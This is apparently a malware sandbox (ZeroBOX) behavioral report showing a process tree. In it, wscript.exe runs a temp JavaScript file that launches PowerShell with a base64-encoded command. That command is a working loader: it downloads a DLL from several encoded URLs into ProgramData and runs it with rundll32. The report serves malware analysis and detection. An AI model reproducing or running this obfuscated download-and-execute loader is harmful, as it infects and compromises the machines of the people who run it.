| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\EEmkwV3LNleuc.js
3068
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
  2276

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents